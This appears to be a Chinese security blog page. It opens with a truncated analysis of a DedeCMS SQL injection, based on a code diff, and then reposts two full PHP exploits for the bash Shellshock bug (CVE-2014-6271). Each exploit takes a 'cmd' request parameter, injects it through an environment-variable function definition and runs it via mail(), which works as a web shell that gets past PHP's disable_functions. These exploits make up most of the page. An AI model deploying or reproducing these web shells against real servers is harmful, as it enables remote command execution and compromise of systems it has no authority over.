DedeCMS全版本通杀SQL注入

Dedecms即织梦(PHP开源网站内容管理系统)是目前著名的网站内容管理之一。以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是用户最多的PHP类CMS系统。近日,网友在Dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,针对该漏洞,网友们充分发挥聪明才智,给出了好几个版本,下面对这个漏洞的利用和实战等情况进行讨论和分析,欢迎进行拍砖!

漏洞分析

1)比较漏洞文件

通过其更新文件说明可以看到主要更新的文件如下:dede/config.php,更新cookies加密密码,禁用标签提示include/uploadsafe.inc.php,可能导致SQL注入漏洞修复member/soft_edit.php,文件上传过滤通过文件分析工具,对早期版本和更新的补丁进行比对,如图1所示,发现修改代码如下:

//*****修补后.php

}

//$$_key=$_FILES[$_key][‘tmp_name’]=str_replace(“\\\\”,”\\”,

$_FILES[$_key][‘tmp_name’]);

$$_key=$_FILES[$_key][‘tmp_name’]=$_FILES[$_key][‘tmp_name’];

${$_key.’_name’}=$_FILES[$_key][‘name’];

//*****修补前.PHP

}

$$_key=$_FILES[$_key][‘tmp_name’]=str_replace(“\\\\”,”\\”,

$_FILES[$_key][‘tmp_name’]);

//吧$_FILES[$_key][‘tmp_name’]里面的\\\\替换为\\

${$_key.’_name’}=$_FILES[$_key][‘name’];

DedeCMS全版本通杀SQL注入漏洞利用 入侵检测 第1张

图1对比分析代码

Continue Reading

PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit

  1. <?php
  2. // Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit
  3. // Date: 22/11/2014
  4. // Exploit Author: ssbostan
  5. // Vendor Homepage: http://www.gnu.org/software/bash/
  6. // Software Link: http://ftp.gnu.org/gnu/bash/
  7. // Version: <= 4.3
  8. // Tested on: Fedora 17, Ubuntu 8.04
  9. // CVE: http://www.cvedetails.com/cve/CVE-2014-6271/
  10. if(isset($_GET[“cmd”]) && !empty($_GET[“cmd”]))
  11. {
  12. $file=tempnam(“/tmp”, “xpl”);
  13. putenv(“PHP_XPL=() { :;}; {$_GET[“cmd”]}>{$file}”);
  14. mail(“xpl@localhost”, “”, “”, “”, “-bv”);
  15. echo file_get_contents($file);
  16. unlink($file);
  17. }
  18. ?>

复制代码

  1. # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
  2. # Google Dork: none
  3. # Date: 10/31/2014
  4. # Exploit Author: Ryan King (Starfall)
  5. # Vendor Homepage: http://php.net
  6. # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
  7. # Version: 5.* (tested on 5.6.2)
  8. # Tested on: Debian 7 and CentOS 5 and 6
  9. # CVE: CVE-2014-6271
  10. <pre>
  11. <?php echo “Disabled functions: “.ini_get(‘disable_functions’).”\n”; ?>
  12. <?php
  13. function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
  14.    if(strstr(readlink(“/bin/sh”), “bash”) != FALSE) {
  15.      $tmp = tempnam(“.”,”data”);
  16.      putenv(“PHP_LOL=() { x; }; $cmd >$tmp 2>&1”);
  17.      // In Safe Mode, the user may only alter environment variables whose names
  18.      // begin with the prefixes supplied by this directive.
  19.      // By default, users will only be able to set environment variables that
  20.      // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
  21.      // PHP will let the user modify ANY environment variable!
  22.      mail(“a@127.0.0.1″,””,””,””,”-bv”); // -bv so we don’t actually send any mail
  23.    }
  24.    else return “Not vuln (not bash)”;
  25.    $output = @file_get_contents($tmp);
  26.    @unlink($tmp);
  27.    if($output != “”) return $output;
  28.    else return “No output, or not vuln.”;
  29. }
  30. echo shellshock($_REQUEST[“cmd”]);
  31. ?>

复制代码

PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit